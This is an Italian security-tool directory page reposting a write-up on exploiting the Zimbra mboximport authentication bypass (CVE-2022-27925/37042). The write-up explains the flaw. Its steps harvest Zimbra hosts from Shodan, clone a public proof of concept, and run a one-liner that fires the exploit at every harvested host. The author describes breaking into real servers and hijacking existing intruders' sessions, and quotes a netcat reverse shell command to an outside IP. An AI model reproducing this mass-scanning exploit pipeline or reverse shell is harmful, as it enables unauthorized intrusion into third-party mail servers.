Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/jam620/zimbra
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFApprendimento e Formazione
GitHubjam620/zimbra

Zimbra

CVE-2022-27925

Vedi Repository
813 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Zimbra — CVE-2022-27925 | Kitploit

Sfruttamento Attivo di Zimbra CVE-2022-37042 (RCE Non Autenticato)

La seguente ricerca è iniziata cercando di comprendere le PoC di vari repository su GitHub condivisi da molti ricercatori e si è conclusa con una sorpresa interessante, che condividerò nei prossimi paragrafi. Il 10 agosto di quest'anno il gruppo di ricerca sulla sicurezza Volexity ha pubblicato sul suo account Twitter la scoperta dello sfruttamento di massa della suite ZCS (Zimbra Collaboration Server) che consentiva un bypass dell'autenticazione e che circa 1000 istanze di Zimbra erano compromesse a livello mondiale.

Nella ricerca presentata dai colleghi di Volexity mostravano parte dei log consultati

root@kitploit:~
[attacker_ip] - - [30/Jun/2022:05:33:18 +0000] "POST [snipped]/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=true HTTP/1.0" 401 299 "[snipped]" "Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0" 7

Allo stesso modo spiegavano che il difetto del codice era dovuto alla funzione doPost,

Il problema con questo codice è che viene verificata l'autenticazione e viene impostato un messaggio di errore, ma non c'è una dichiarazione di ritorno. Ciò significa che il codice successivo continuerà ad eseguirsi, indipendentemente dallo stato di autenticazione dell'utente. Seguendo la funzione verso il basso, un attaccante deve solo impostare i parametri corretti nell'URL per sfruttare la vulnerabilità.

Una volta comprese le possibili cause e dopo che erano già usciti alcuni PoC, procediamo a realizzare lo sfruttamento passo dopo passo, ma prima indagheremo sullo stato utilizzando lo strumento greynoise

Osserviamo che a più di un mese dalla pubblicazione del CVE-2022-27925 continuano a effettuare attacchi

Su Shodan possiamo osservare circa 45.223 installazioni di Zimbra

Requisiti

  1. VPS preferibilmente Ubuntu Server 20.04
  2. Un account Shodan configurato per utilizzare la CLI e la sua API
  3. Avere docker installato
  4. Installare jq

PoC

  1. Enumerazione di possibili target

shodan download --limit -1 zimbra.json.gz http.favicon.hash:"1624375939"

Andiamo a esaminare i risultati

shodan parse --fields ip_str,port --separator , zimbra.json.gz > zimbra.txt

Andiamo a rivedere un po' i dati e dargli il formato necessario per automatizzare i test

Analizziamo i dati per poter utilizzare un online

Utilizzeremo httpx in docker

Scarichiamo la PoC da GitHub

git clone https://github.com/vnhacker1337/CVE-2022-27925-PoC

Proviamo l'oneliner con la PoC, è importante notare che dobbiamo spostare il file analizzato nella directory della PoC o chiamarlo con il percorso assoluto, anche utilizzando il dump di Shodan possiamo usarlo

root@kitploit:~
cat zimbra.json | jq -r '.hostnames[]' | docker run -i projectdiscovery/httpx -silent | xargs -I@ sh -c 'python3 zimbra-exploit.py @ 313.zip' | egrep -v '404|401|405|200'

Durante questo test molti target appaiono già patchati

Finalmente abbiamo ottenuto un risultato

  1. APT, botnet e ransomware

Una volta sfruttata la vulnerabilità, osserviamo file che sono script di APT per eseguire l'esfiltrazione delle informazioni e la preparazione del ricatto

file malevolo gift

File di backup ed esfiltrazione

Una delle route che abbiamo trovato conteneva molteplici webshell

/opt/zimbra/jetty_base/webapps/zimbraAdmin/

Un'analisi dei processi in esecuzione ha dimostrato che venivano installati cronjob per impacchettare le email

Nota: quanto segue è stato realizzato a fini educativi e come buona azione

  1. Acquisizione delle shell installate dagli APT

Una volta identificato il download di netcat, abbiamo proceduto a prendere la sessione degli attaccanti, si osserva l'uso di netcat ./nc 52.90.92.82 443 -e /bin/bash

immagine18 immagine19

Una vulnerabilità segnalata pubblicamente più di 30 giorni fa è ancora in vigore al momento della stesura di questo articolo, va notato che i soggetti colpiti sono stati notificati senza successo poiché la vulnerabilità rimane attiva.

Scarica lo strumento